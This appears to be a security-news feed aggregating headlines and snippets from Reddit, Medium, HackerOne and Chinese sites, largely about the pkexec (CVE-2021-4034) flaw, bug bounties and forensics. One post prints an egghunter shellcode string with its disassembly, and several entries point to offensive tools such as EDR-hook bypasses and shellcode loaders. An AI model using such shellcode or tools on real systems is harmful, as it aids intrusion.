    🔍 Introduction XXE(XML External Entity)는 XML을 Parsing하여 사용하는 서비스에 악의적인 XML 구문을 Parsing하도록 유도하여 공격자가 의도한 동작을 수행하도록 하는 공격입니다. 기본적으로 XML Parser가 위치한 곳에서 부터 영향력이 발생하기 때문에 가볍게는 SSRF 같이 내부망 접근부터, RCE까지 큰 영향력을 가질 수 있습니다. 🗡 Offensive techniques Detect 심플하겐 XML Parse가 동작하는 구간을 찾아야합니다. 소스코드를 볼 수 있는 상황이라면 코드에서 검색하는 것이 가장 빠르고 효율적이며, 소스코드 없이 순수하게 동작만으로만 봐야한다면 .xml 파일을 인자값으로 받거나, 에러에서 XML Parsing 관련 에러를 뱉는 구간을 위주로 점검해야합니다.
  • Open

    Pwnkit: How to exploit and check
    submitted by /u/DevSec23 [link] [comments]
    Reversing ALPHV (aka BlackCat): Rust-Based Ransomware
    submitted by /u/rsobers [link] [comments]
    Bypassing Little Snitch Firewall with Empty TCP Packets
    submitted by /u/hackers_and_builders [link] [comments]
    Perfect wordlist to discover directories and files on target size with tools like ffuf.
    submitted by /u/mexhanical [link] [comments]  ( 1 min )
    wholeaked: a file-sharing tool that allows you to find the responsible person in case of a leakage
    submitted by /u/utku1337 [link] [comments]  ( 2 min )
    AD CS: weaponizing the ESC7 attack - BlackArrow
    submitted by /u/apanonimo [link] [comments]
    Self-contained exploit for CVE-2021-4034 (Pkexec 1-day LPE)
    submitted by /u/ly4k_ [link] [comments]
    Exploit for CVE-2021-4034 that does not leave syslog entries
    submitted by /u/hermajordoctor [link] [comments]
    Webcam Hacking (again) - Safari UXSS
    submitted by /u/Straight_Finding_756 [link] [comments]
  • Open

    [Question] Using Shodan or another 'search engine' to find MS SQL servers
    Is it possible to use Shodan or another engine to find public facing SQL servers, more specifically, if you know of a database name, could it be found? I realize MS SQL has some default ports, and I can search for those, but I'm curious to know if its possible to search for a database name, too. TIA. submitted by /u/Drivingmecrazeh [link] [comments]  ( 1 min )
    Password cracking options..
    What do you think is a great password cracking tool? A pen tester on my team asked me to crack a few passwords and NTLM hashes. I'm new to the team and when the other guy left he wiped everything so the only thing I know we had was PRTK which is a POS in my opinion. I downloaded hashcat but feel like I'm missing something to make it more efficient. Before I spend too much time trying to improve hashcat, what do you use? What's the price of it? submitted by /u/Korgibot [link] [comments]  ( 1 min )
    What does a booter/stresser site need to do in order to be legal?
    Ive seen tons of these booter projects and am aware that under certain circumstances the websites themselves are completely legal. what separates Redwolf, from other DDoS sites you find all around in terms of legality. I understand that Redwolf is used legally and the other ones usually arent but what makes the website itself from being legal or illegal? submitted by /u/raultheuniverse [link] [comments]  ( 1 min )
    Accidentally DIRBed the wrong site
    I was playing around with dirb and was going to run it on a private test site but had a typo and accidentally ran it on an actual website and didn't realize for a few minutes that I had messed it up. Should I reach out to site administrator or be concerned or is it ok? EDIT: Lmfao at the comments keep them coming submitted by /u/Mesachi_06 [link] [comments]  ( 2 min )
    Sitting through Offsec 2-3 day exams
    I'm wondering what people with full time jobs and kids are doing about the Offsec courses with 2-3 day exams. Are you just biting the bullet and taking the exam or just taking the training and not taking the exam? After OSCP I've been just taking the Offsec trainings and going over material, but without a goal like taking an exam and getting the certification there's very little motivation to study the material. I usually go over the pdf to pick up some new tricks and move on. After full day of work and family I don't even know when to find 2-3 days straight to do the exam. I still don't understand why Offsec doesn't change the exams to 5 days and let people do it like it's done in a real world instead of putting unnecessary pressure with ctf style exam time frame. Also when I took OSCP exam I didn't have to deal with being monitored. I get up from computer chair every 20 minutes and I can see getting annoyed about having to deal with this for 2-3 days pretty fast. submitted by /u/ravenoverflow [link] [comments]  ( 5 min )
  • Open

    A brief overview of JWT and its exploits
    Introduction Continue reading on System Weakness »
    A brief overview of JWT and its exploits
    Introduction Continue reading on Medium »
    Beginner Bug Bounty Guide - Part 4
    Previous : Beginner Bug Bounty Guide - Part 3 Continue reading on Medium »  ( 2 min )
    Beginner Bug Bounty Guide - Part 3
    Previous : Beginner Bug Bounty Guide - Part 2 Continue reading on Medium »
    How to spoof e-mails. (DMARC, SPF, and Phishing)
    Note: sanitization of these screenshots was performed to protect the identities of stakeholders involved. Continue reading on Medium »
    PORTSWIGGER WEB SECURITY - DIRECTORY TRAVERSAL LAB ÇÖZÜMLERİ
    Directory Traversal (Dizin-Dosya Geçişi), saldırganların bir web sunucusundaki kısıtlı dizinlere erişmesine ve web sunucusunun kök dizini… Continue reading on Medium »  ( 3 min )
  • Open

    Redis – Vulnerability Disclosure Program
    Article URL: https://hackerone.com/redis-vdp Comments URL: https://news.ycombinator.com/item?id=30091276 Points: 2 # Comments: 0
    Local privilege escalation vulnerability in polkit’s pkexec
    Article URL: https://www.sesin.at/2022/01/25/local-privilege-escalation-vulnerability-in-polkits-pkexec-cve-2021-4034-tue-jan-25th/ Comments URL: https://news.ycombinator.com/item?id=30086222 Points: 2 # Comments: 0  ( 8 min )
    PwnKit: Local Privilege Escalation Vulnerability Discovered in Polkit’s Pkexec
    Article URL: https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034 Comments URL: https://news.ycombinator.com/item?id=30086204 Points: 1 # Comments: 0  ( 7 min )
    Android security tool APKLeaks patches critical vulnerability
    Article URL: https://portswigger.net/daily-swig/android-security-tool-apkleaks-patches-critical-vulnerability Comments URL: https://news.ycombinator.com/item?id=30085811 Points: 1 # Comments: 0  ( 3 min )
    Local privilege escalation vulnerability in polkit’s pkexec (CVE-2021-4034)
    Article URL: https://www.sesin.at/2022/01/25/local-privilege-escalation-vulnerability-in-polkits-pkexec-cve-2021-4034-tue-jan-25th/ Comments URL: https://news.ycombinator.com/item?id=30081671 Points: 1 # Comments: 0  ( 8 min )
    PwnKit: Vulnerability in Polkit (CVE-2021-4034)
    Article URL: https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034 Comments URL: https://news.ycombinator.com/item?id=30081666 Points: 5 # Comments: 0  ( 7 min )
  • Open

    Password cracking tools
    What do you think is a great password cracking tool? A pen tester on my team asked me to crack a few passwords and NTLM hashes. I'm new to the team and when the other guy left he wiped everything so the only thing I know we had was PRTK which is a POS in my opinion. I downloaded hashcat but feel like I'm missing something to make it more efficient. Before I spend too much time trying to improve hashcat, what do you use? submitted by /u/Korgibot [link] [comments]  ( 1 min )
    Timeline from MFTECmd VS plaso & log2timeline
    I was taught these 2 methods of creating timelines from MFT. I am familiar with using the timeline output from MFTECmd. Is there a reason I should be using timeline from plaso & log2timeline? Are there benefits or details there I could miss from using MFTECmd? Because it seems slightly more tedious to generate timeline using plaso & log2timeline. Comments from those who use both? submitted by /u/bangfire [link] [comments]  ( 1 min )
    Encase Endpoint
    Any users of this product? How useful do you think it is? Have any real competitors popped up? (I've heard Symantec mentioned) I've heard some former customers say it was 10x+ cheaper than running multiple physical extractions with a large consultant submitted by /u/Nick_Investor [link] [comments]  ( 1 min )
  • Open

    AD CS: weaponizing the ESC7 attack - BlackArrow
    submitted by /u/gid0rah [link] [comments]
    chvancooten/NimPackt-v1: Nim-based assembly packer and shellcode loader for opsec & profit
    submitted by /u/dmchell [link] [comments]
    Evolved phishing: Device registration trick adds to phishers’ toolbox for victims without MFA
    submitted by /u/SCI_Rusher [link] [comments]
    Hacktivist group shares details related to Belarusian Railways hack
    submitted by /u/dmchell [link] [comments]
  • Open

    10 GiB of Classic music in FLAC or APE format
    https://funambule.org/classique/ submitted by /u/Appropriate-You-6065 [link] [comments]  ( 1 min )
    How can I stop getting my WiFi flagged??
    My network provider (or rather Warner Bros.) has flagged a download that I attempted for Dune (the 2021 movie). I wanna know how I can stop having my WiFi's address flagged for DMCA claims. submitted by /u/Raven_Claw7621 [link] [comments]  ( 1 min )
    AU/NZ/CA - TV & movie archive
    submitted by /u/vsharer [link] [comments]
    rotary telephones
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Sooooo..... What happened to the Homeland Security post?
    be me see post click and see files nope the fuck out of there.... submitted by /u/ringofyre [link] [comments]  ( 1 min )
  • Open

    【安全通报】Linux Polkit本地权限提升漏洞(CVE-2021-4034...
    近日,网络上出现 Linux 下 Polkit 工具集的本地权限提升漏洞,任何非特权本地用户可通过此漏洞获取root权...
  • Open

    【安全通报】Linux Polkit本地权限提升漏洞(CVE-2021-4034...
    近日,网络上出现 Linux 下 Polkit 工具集的本地权限提升漏洞,任何非特权本地用户可通过此漏洞获取root权...
  • Open

    CVE-2022-0185: Container+Kubernetes manifest as crash POC
    Article URL: https://github.com/discordianfish/cve-2022-0185-crash-poc/blob/main/crash.c Comments URL: https://news.ycombinator.com/item?id=30087809 Points: 1 # Comments: 0  ( 1 min )
    Local privilege escalation vulnerability in polkit’s pkexec (CVE-2021-4034)
    Article URL: https://www.sesin.at/2022/01/25/local-privilege-escalation-vulnerability-in-polkits-pkexec-cve-2021-4034-tue-jan-25th/ Comments URL: https://news.ycombinator.com/item?id=30081671 Points: 1 # Comments: 0  ( 8 min )
    PwnKit: Vulnerability in Polkit (CVE-2021-4034)
    Article URL: https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034 Comments URL: https://news.ycombinator.com/item?id=30081666 Points: 5 # Comments: 0  ( 7 min )
  • Open

    HOW HACKERS ARE CHANGING LIVES
    This question is going around for a long time. Are hackers doing good in the world? Well, instead of hacking into healthcare systems and… Continue reading on InfoSec Write-ups »  ( 2 min )
  • Open

    SecWiki News 2022-01-26 Review
    2021年度高级威胁研究报告 by ourren [HTB] Safe Writeup by 0x584a 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2022-01-26 Review
    2021年度高级威胁研究报告 by ourren [HTB] Safe Writeup by 0x584a 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    老版OSCP准备及考试经验
    本人于2021年12月通过了OSCP考试,由于OSCP考试于2022年1月11号改革, 文中考试经历部分的参考价值就不大了; 干货和备战部分还是可以参考一下  ( 1 min )
    FreeBuf早报 | Linux系统爆出新漏洞,影响所有版本;Segway 电子商店被攻击
    Polkit的pkexec 组件中存在一个安全漏洞(CVE-2021-4034),这意味着几乎所有的Linux 发行版的默认配置都包含此漏洞,攻击者可通过该漏洞获得系统的root权限。  ( 1 min )
    基于钓鱼攻击的技术点研究
    钓鱼思路学习研究。  ( 1 min )
    如何使用Yakit进行流量劫持
    yakit基本实现了burp劫持和抓包的功能,在具体使用场景上也能基本覆盖,作为刚起步不久的开源项目,希望大家多多关注~  ( 1 min )
    严重的编程错误或致文件删除、黑客使用新恶意软件逃避检测|1月26日全球网络安全热点
    Rust编程语言的维护者发布了一个针对高严重性漏洞的安全更新,该漏洞可能被恶意方滥用,以未经授权的方式从易受攻击的系统中清除文件和目录。  ( 1 min )
    如何使用FaPro批量模拟设备
    通过FaPro,可以使用一条命令,直接创建一个虚拟网络,并在其中模拟多个不同的设备。  ( 1 min )
    《中国企业网络安全意识教育现状与发展报告》发布
    《中国企业网络安全意识教育现状与发展报告》(以下简称《报告》)近日发布。  ( 1 min )
    《银行保险机构信息科技外包风险监管办法》发布,严控机构外包风险
    《办法》共7章46条,对银行保险机构信息科技外包风险管理提出全面要求。
    【Rootkit 系列研究】Windows平台的高隐匿、高持久化威胁
    本文从Rootkit的生存期、可达成的效果,以及运用这项技术展开攻击的可行性等角度展开讨论。  ( 1 min )
    《浙江省公共数据条例》将于3月1日执行,再次强调个人信息安全
    《条例》共五十一条内容,明确提出打造公共数据平台,建立公共数据共享机制,构建公共数据有序开放制度。
    首届「网安新势力」大会专家评委团正式公开
    14位网络安全行业专家评委,快来一睹真容!
  • Open

    Specific Payload makes a Users Posts unavailable
    FetLife disclosed a bug submitted by castilho: https://hackerone.com/reports/1176794 - Bounty: $100
  • Open

    ROP Hello World!
    submitted by /u/Kubiszox [link] [comments]
  • Open

    Ethical Hacking — Buffer Overflow Parte 2
    Fuzzing é uma técnica de teste de software que fornece dados inválidos, ou seja, dados inesperados ou aleatórios como entrada para um… Continue reading on Medium »  ( 2 min )
  • Open

    Ethical Hacking — Buffer Overflow Parte 2
    Fuzzing é uma técnica de teste de software que fornece dados inválidos, ou seja, dados inesperados ou aleatórios como entrada para um… Continue reading on Medium »  ( 2 min )

  • Open

    Is there anything equivalent to javas requestdispatcher.forward system in other programming languages?
    Its the easiest thing to leverage for pre auth bugs just looking at web.xml and leveraging internal forwards to touch apis that normally require auth and I would love to find something similar in other languages. The closest thing ive found is a special type of open redirect where the devs decided to keep previous session data making it useful for auth bypasses in some php projects. See the thing is open redirects usually kill previous session data making them useless for auth bypassing on their own and the java forward system is like an internal version/server sided version of a redirect that keeps session data and forwards everything along intact. submitted by /u/Academic-Discount252 [link] [comments]  ( 1 min )
    Could blind mass assignment be a rare type of bug?
    Some people know it as reflection binding, mass assignment or insecure direct object mapping which is the opposite of insecure direct object reference your basically writing data instead of reading it or appending data. So ive noticed in some places ill send hidden parameters and the json response won’t show anything interesting but ill refresh the page and ill get like a discount or something say I add the parameters isSpecialDiscount: true the response won’t show anything related so its a blind mass assignment bug and in some cases ive seen partial blind mass assignment where the json response will change to true for some things but still say false for others despite the request setting it as true but when I refresh the page the server grants me the discount proving its processing the input and assigning my session a discount. Ive never really seen people discuss blind or partial blind mass assignment being a thing but im finding them a lot more now its weird. Usually I used to look at the json response to see if parameter values are changing but I now see I can’t even trust that completely to prove a mass assignment bug exists. submitted by /u/Academic-Discount252 [link] [comments]  ( 1 min )
    Anyone who works in a SOC dealing with disadvantages in maturing due to lack of management experience?
    Just curious how some of you guys who work in a SOC, whether it’s as an analyst or engineer, with a manager who doesn’t have the background. Do you have a lot of influence in shaping the SOC? Run in to roadblocks justifying tools or maybe maturing your processes? submitted by /u/bankster24 [link] [comments]  ( 2 min )
    Looking for first steps in changing careers with an unrelated(?) master's degree
    Hello /r/AskNetsec, this is my first post on here. I recently (coming up on a year) graduated with a M.A. in Forensic Psychology and Intelligence Analysis. This degree is not opening the doors in the psychology field I was hoping it would, and quite frankly, the work I have done in this field is not what I wanted out of my career. I have always been fascinated by cybersecurity, and it is a large part of the reason I decided to pursue the Intel part of my degree. My question to you all is this: What first steps would someone in my position take in trying to get into the Cybersecurity field? Ideally I would like to eventually work my way to a Security Analyst position. I have no qualms about starting at the lowest positions to work my way up, but am clueless on where to start. I have some coding knowledge in Python and Java, but as far as IT knowledge I am a total newbie. Are there certifications or courses I should prioritize? I would like to avoid going back to a university setting, as I have spent enough time and money doing that for the time being. Thank you to anybody who reads this and decides to respond, I really appreciate it. submitted by /u/Lambeau_Leap [link] [comments]  ( 1 min )
    Worth getting Net+/Sec+ with 3 years of exp in Blue Teaming?
    Heyhey, I'm not quite new to blue teaming (threat hunt & detection) but would like to have my options open in case I want to jump to a more senior tech role in the next year or so. I have a computer engineering degree and a SANS 401 (GSEC) cert too. Do you think it's worth getting? Thanks! submitted by /u/youmakemismile [link] [comments]  ( 1 min )
    Do RSA key fobs really strengthen security?
    Originally they did, I know. But there was this story about Chinese hackers compromising RSA, getting into the deepest levels of the production and key generation process. As a result, RSA alerted each and every customer of theirs and told them to use a personal PIN together with the code generated by the key fob. This is what I'm doing now on a daily basis. Now you have: your account password your PIN you use together with the RSA-generated code and the RSA-generated code The RSA codes are compromised and you have to assume that there's some people out there knowing all the codes and algorithms. But that means they really aren't worth much, basically you only have a password and another, limited password called PIN - which is usually shorter and numbers only. The most you can expect from this is that - let's say - 10 characters alphanumeric + 6 digits is somewhat better than just the 10 characters alphanumeric, plus there's a good chance that they are stored in different systems, so less likely to seized at the same time by some black hats. Is that true or do these key fobs still have an added value? submitted by /u/mshthn [link] [comments]  ( 2 min )
    Simple question about nmap
    If my friend tells me what his public IP address is and I use nmap to do a port scan on his public IP address, then what exactly is being port scanned? Since every device in his house will have the same public IP address. submitted by /u/LagunaLoireFF8 [link] [comments]  ( 2 min )
    Received H1 bug bounty but think I maybe should have gotten more. Am I just being greedy?
    I have received a bounty just under 20k. I understand that that’s a lot of money but I am curious from experts whether this is about the most I’ll get and I should just move on. I can’t disclose too much but I found a way to make myself very very rich very easily (no actual tools or request spoofing required). I’ve thought of some ways that one could have theoretically easily taken the free money with no trace and ran if they were a legitimate crook. The bug had been around for a while (Longer than a week). Unsure of how bad it was in terms of actual internal damages. I can honestly say that I probably saved them potential millions if not actual millions. It feels like the amount I received is honestly not much at all given the severity of it. Having said all of that, it wasn’t very hard to reproduce. It was less of a penetration report involving much skill and more of a “holy shit guys, your product is clearly broken and I can’t believe this hasn’t been patched” Am I being completely unreasonable/greedy? I should also note that their market cap is far into the billions which is why I am making this post to begin with. They’re a major industry leader. submitted by /u/csthrowawayyyy [link] [comments]  ( 4 min )
    Is an associates degree worth getting?
    I was told experience and certs are mostly required for most jobs aside from roles in management, which requires a BS or even masters. So I am just curious if there is any value in just getting an AS. The role that currently interests me is SOC analyst if that helps. I also heard of the WGU online program for a BS or masters in cybersecurity. If I plan on doing management in the future, is it worth getting my degree through this program? submitted by /u/RaZdoT [link] [comments]  ( 2 min )
  • Open

    How “Docker” can help you become a better hacker
    Continue reading on Medium »
    Ensuring protocol security with Immunefi bug bounty program
    Calling all devs and hackers. Help enhance our smart contract security and prevent thefts, freezes, and unintended changes and earn. Continue reading on Medium »  ( 2 min )
    I found a way to extract passwords from any iOS device. When I reported it to Apple? Silence.
    Apple’s Bug Bounty program, in theory, incentivizes programmers to report flaws they find in the company’s code. In practice? Not so much. Continue reading on Medium »  ( 3 min )
    What I learnt from reading 220* IDOR bug reports.
    IDOR — Insecure Direct Object Reference, abuse of the lack of authentication at every stage. Continue reading on Medium »  ( 3 min )
    First Bounty! Disable 2FA of any user via OTP bypass
    Getting that first bug bounty is a special feeling for any bug hunter. This is my first write up so please bear with me. Continue reading on Medium »  ( 1 min )
    First Valid BUG Finding At Microsoft And I Got the Acknowledgments Page Microsoft
    Hi Everyone. Continue reading on Medium »  ( 2 min )
    How I could have read your confidential bug reports by simple mail?
    Hey Everyone, Hope you’re doing safe and sound. Continue reading on InfoSec Write-ups »  ( 2 min )
    How I was able to takeover accounts in websites deal with Github as a SSO provider
    Introduction Continue reading on InfoSec Write-ups »  ( 3 min )
  • Open

    pwntools on m1 mac?
    Hello, I'm working on creating a tutorial binary exploit for an m1-based mac. For simplicity and portability i'm using an M1-based Kali VM and trying to use aarch64 shellcraft but getting weird errors and wondering if anyone has successfully gotten pwn to work for them? ​ Main error message when trying to use asm() on a shellcraft payload is: pwnlib.exception.PwnlibException: Could not find 'as' installed for ContextType() Try installing binutils for this architecture: https://docs.pwntools.com/en/stable/install/binutils.html ​ but dont know what binutils arch it's expecting, i tried installing a couple to no avail. ​ appreciate any of yall's time thanks submitted by /u/superiorpyre [link] [comments]  ( 1 min )
    Fuzzing Ethereum Smart Contract using Echidna - Blockchain Security #1
    submitted by /u/pat_ventuzelo [link] [comments]
    Shellcode to x86, x64 Assembly
    Sharing a quick python3 command line tool I made to disassemble shellcode without having to remember the nuances of python2 v python3 strings and writing to a file each time: https://gitlab.com/stormblest/exploit-dev-tools/-/blob/main/shellcode2asm.py Includes python unittests in Gitlab. Example: ``` $ python3 shellcode2asm.py "\xbb\x90\x50\x90\x50\x31\xc9\xf7\xe1\x66\x81\xca\xff\x0f\x42\x60\x8d\x5a\x04\xb0\x21\xcd\x80\x3c\xf2\x61\x74\xed\x39\x1a\x75\xee\x39\x5a\x04\x75\xe9\xff\xe2" -a 32 shellcode: "\xbb\x90\x50\x90\x50\x31\xc9\xf7\xe1\x66\x81\xca\xff\x0f\x42\x60\x8d\x5a\x04\xb0\x21\xcd\x80\x3c\xf2\x61\x74\xed\x39\x1a\x75\xee\x39\x5a\x04\x75\xe9\xff\xe2" 00000000 BB90509050 mov ebx,0x50905090 00000005 31C9 xor ecx,ecx 00000007 F7E1 mul ecx 00000009 6681CAFF0F or dx,0xfff 0000000E 42 inc edx 0000000F 60 pusha 00000010 8D5A04 lea ebx,[edx+0x4] 00000013 B021 mov al,0x21 00000015 CD80 int 0x80 00000017 3CF2 cmp al,0xf2 00000019 61 popa 0000001A 74ED jz 0x9 0000001C 391A cmp [edx],ebx 0000001E 75EE jnz 0xe 00000020 395A04 cmp [edx+0x4],ebx 00000023 75E9 jnz 0xe 00000025 FFE2 jmp edx ``` submitted by /u/blutitanium [link] [comments]  ( 1 min )
  • Open

    Able to steal private files by manipulating response using Auto Reply function of Lark
    Lark Technologies disclosed a bug submitted by imran_nisar: https://hackerone.com/reports/1387320 - Bounty: $2000
    Able to steal private files by manipulating response using Compose Email function of Lark
    Lark Technologies disclosed a bug submitted by imran_nisar: https://hackerone.com/reports/1373784 - Bounty: $2000
    Subdomain Takeover
    Mail.ru disclosed a bug submitted by official_dhivish: https://hackerone.com/reports/1348504
    Cross site scripting via file upload in subdomain ads.tiktok.com
    TikTok disclosed a bug submitted by blubluuu: https://hackerone.com/reports/1433125 - Bounty: $500
  • Open

    Watering hole deploys new macOS malware, DazzleSpy, in Asia
    submitted by /u/dmchell [link] [comments]
    Extracting Cobalt Strike Beacon Configurations - Elastic Security Research
    submitted by /u/dmchell [link] [comments]
    RBCD WebClient attack | Franky's WebSite
    submitted by /u/dmchell [link] [comments]
    hlldz/RefleXXion: RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks
    submitted by /u/dmchell [link] [comments]  ( 1 min )
  • Open

    Major Linux PolicyKit security vulnerability uncovered: Pwnkit
    Article URL: https://www.zdnet.com/article/major-linux-policykit-security-vulnerability-uncovered-pwnkit/ Comments URL: https://news.ycombinator.com/item?id=30077665 Points: 7 # Comments: 0  ( 4 min )
    Rust vulnerability enables attackers to delete files and directories
    Article URL: https://developer-tech.com/news/2022/jan/24/rust-vulnerability-enables-attackers-delete-files-and-directories/ Comments URL: https://news.ycombinator.com/item?id=30072868 Points: 5 # Comments: 1  ( 4 min )
    Dark Souls servers taken down following discovery of critical vulnerability
    Article URL: https://arstechnica.com/information-technology/2022/01/dark-souls-servers-taken-down-following-discovery-of-critical-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=30069692 Points: 3 # Comments: 0  ( 2 min )
  • Open

    pwnkit: Local Privilege Escalation in polkit's pkexec (CVE-2021-4034)
    submitted by /u/TheSwedishChef24 [link] [comments]
    Mind Your Dependencies: Defending against malicious npm packages
    submitted by /u/SRMish3 [link] [comments]
    We purchased a machine from China and it came with malware preinstalled
    submitted by /u/lormayna [link] [comments]  ( 2 min )
    Cracking Randomly Generated Passwords
    submitted by /u/hyperreality_monero [link] [comments]  ( 1 min )
    RBCD attack & defense. From Domain User to DA on default domain controllers settings. Including webclient service activation
    submitted by /u/k3nfr4 [link] [comments]  ( 1 min )
    Finding vulnerabilities in Swiss Post’s future e-voting system - Part 1
    submitted by /u/0xdea [link] [comments]  ( 1 min )
    Recovering redacted information from pixelated videos
    submitted by /u/breakingsystems [link] [comments]  ( 1 min )
    Solarwinds Web Help Desk: When the Helpdesk is too Helpful
    submitted by /u/Mempodipper [link] [comments]
  • Open

    Pwnkit: Local Privilege Escalation in polkit's pkexec (CVE-2021-4034)
    Article URL: https://seclists.org/oss-sec/2022/q1/80 Comments URL: https://news.ycombinator.com/item?id=30077271 Points: 112 # Comments: 41  ( 5 min )
    Pwnkit: Local Privilege Escalation in polkit's pkexec (CVE-2021-4034)
    Article URL: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt Comments URL: https://news.ycombinator.com/item?id=30075993 Points: 4 # Comments: 2  ( 5 min )
  • Open

    3 outils à connaître absolument pour la recherche d’information
    Durant une recherche sur internet, nous tombons souvent sur des formats de données qui sont à première vue inexploitables directement. Continue reading on Medium »  ( 3 min )
    Python: Speech To Text Conversion
    Simple Python code for converting audio data to text format Continue reading on Medium »  ( 1 min )
    Ukraine: tracking the deployments
    Making sense of the open source intelligence Continue reading on HOW TO STOP FASCISM »
  • Open

    Trainings or Courses or Labs?
    Howdy all, Any idea where I can find the following for Memory Forensics? I’m trying my best to learn the most of Memory Forensics! Have completed the Cyber Defenders lab! Free or Minimal Cost one would be appreciated as I’m just a beginner in my field! Thanks! submitted by /u/GloryHunter9 [link] [comments]  ( 1 min )
    ftk Imager gets hung
    So I was attempting to take an E01 image of a file server. But it would just get hung right away. For ftk I tried to run it as a logical volume to image it, and still it would get hung. So I used a live boot of Linux and tried to use guymaner and it would just close. It is a Raid 6 I believe. Any other recommendations on how I could take an EO1 image of the FS? Thanks submitted by /u/Pizza_Eating_Robots [link] [comments]  ( 2 min )
    CHFI certification is good at discounted price
    I have read many posts about EC Council not being good for any certification. But my question is if it's offered to me at a discounted price (99$) then it's good or still bad. Please note that this cert is being sponsored by my school, although it's not compulsory for me to join but I topped the merit list and they offered me to pay 99$ to get its voucher. So shall I go to it or simply deny it? submitted by /u/hardfire005 [link] [comments]  ( 2 min )
    Intro to Windows Registry artifacts with TryHackMe Windows Forensics Room.
    submitted by /u/DFIRScience [link] [comments]  ( 1 min )
    How do you think accuracy and precision applies to DFIR?
    I stumbled across accuracy and precision and was wondering how forensic examiners think it applies to DFIR, if at all. Maybe software, artifacts, attribution? Thoughts? https://preview.redd.it/a3xvkvnl1ud81.png?width=1024&format=png&auto=webp&s=d1ff7da688bfb06abfdaea08136cb0924c92c2fc submitted by /u/greyyit [link] [comments]  ( 3 min )
    Recovering deleted/cached images (Mac)
    I have been trying to find ways to recover deleted images from a discord server, and found that all content is stored in some form onto its cache in "~/Library/Application Support/discord/cache". The result is something like this. There seem to be some ways to recover it on windows, however, is it possible on macOS? I have no idea what I am looking at here, so forgive me for ignorance. https://preview.redd.it/brl4u4s2qtd81.png?width=1832&format=png&auto=webp&s=c87beca7931e74351107f7eea57abe24711b073c submitted by /u/Nitrote [link] [comments]  ( 1 min )
    How can I access mmssms.db without rooting phone?
    Hi, I would like to recover some deleted SMS messages. I do not know, how to access the mmssms.db, when plugging my phone to my PC without actually rooting it. What are my best options? Also how far back in time do you think I could recover the texts? submitted by /u/prois99 [link] [comments]  ( 1 min )
    Alcatel GO Flip V access?
    No idea where else to ask. There’s an Alcatel Go Flip V that I need text message logs from for a court case. I used to use BitPim for this sort of thing, but that hasn’t had profiles updated for years. I hate to phrase this in such a phone-specific way, but this phone is killing me, and I’ve tried a whole lot: Does anyone know any way to get legible texts from an Alcatel GO Flip V? Or is there anywhere else I should ask? submitted by /u/hmmqzaz [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-01-25 Review
    2021密码应用技术白皮书 by ourren 2021年网络检测和响应报告 by ourren 2021网络空间测绘年报 by ourren 流量全密化趋势下的检测困境和思考 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2022-01-25 Review
    2021密码应用技术白皮书 by ourren 2021年网络检测和响应报告 by ourren 2021网络空间测绘年报 by ourren 流量全密化趋势下的检测困境和思考 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    RESTler: Stateful REST API fuzzing tool
    Article URL: https://github.com/microsoft/restler-fuzzer Comments URL: https://news.ycombinator.com/item?id=30073154 Points: 4 # Comments: 0  ( 6 min )
  • Open

    My CRTO course and exam review
    Motivation of The Journey Continue reading on Medium »  ( 4 min )
  • Open

    ClickJackingggg!!
    Clickjacking is an interface-based attack in which a user is tricked into clicking on actionable content on a hidden website by clicking… Continue reading on Medium »  ( 2 min )
  • Open

    Weaponization of Excel Add-Ins Part 1: Malicious XLL Files and Agent Tesla Case Studies
    We observed a new surge of Agent Tesla and Dridex malware samples dropped by malicious Excel add-ins (XLL files). We focus here on Agent Tesla. The post Weaponization of Excel Add-Ins Part 1: Malicious XLL Files and Agent Tesla Case Studies appeared first on Unit42.
  • Open

    Hack into Skynet —  Real World CTF (2022) walkthrough
    In this writeup, I’m sharing one of the potential methods to pwn a web challenge on Real world CTF 2022. All challenges built on top of real-world applications & due to the impact of COVID-19, The…  ( 5 min )
    Attacks on JSON Web Token (JWT)
    In part1 of the article, I introduced JSON web tokens that what is JWT and How they are made? I prefer to take a look at that before you go…  ( 8 min )
    How I ended up downloading a malware
    Hello folks!!! My brother and I were bored this weekend and decided to play a game, so he downloaded the game. Here’s the fascinating part…  ( 4 min )
    How I passed CEH (Practical) in my first attempt by Guru HariHaraun
    Hello guys! I’m Guru HariHaraun, 21 years old. In this blog, I will be sharing with you my secret strategy I followed to pass CEH…  ( 7 min )
    How I was able to find multiple vulnerabilities of a Symfony Web Framework web application
    Found high severity vulnerability in 5 minutes just from reconnaissance. Found multiple vulnerabilities on a web application that used the…  ( 3 min )
    Hacking Microsoft Forms
    Since the growth of Online learning during this pandemic — students, researchers have been on an hunt for hacks on Microsoft Forms which…  ( 2 min )
    Day 16, Web Reconnaissance Or Information Gathering — Part 1#100DaysofHacking
    Get all the writeups from Day 1 to 15, Click Here Or Click Here.  ( 5 min )
    How I Discovered Thousands of Open Databases on AWS
    My journey on finding and reporting databases with sensitive data about Fortune-500 companies, Hospitals, Crypto platforms, Startups during…  ( 9 min )
    Simple CTF- TryHackme
    CTF  ( 3 min )
    LAB Setup — ModSecurity || Apache as reverse Proxy || Generate& Install self signed SSL…
    A: Configure Apache as reverse proxy and the application [demo.testfire.net] should be accessible via local host entry through configured…  ( 7 min )
  • Open

    Hack into Skynet —  Real World CTF (2022) walkthrough
    In this writeup, I’m sharing one of the potential methods to pwn a web challenge on Real world CTF 2022. All challenges built on top of real-world applications & due to the impact of COVID-19, The…  ( 5 min )
    Attacks on JSON Web Token (JWT)
    In part1 of the article, I introduced JSON web tokens that what is JWT and How they are made? I prefer to take a look at that before you go…  ( 8 min )
    How I ended up downloading a malware
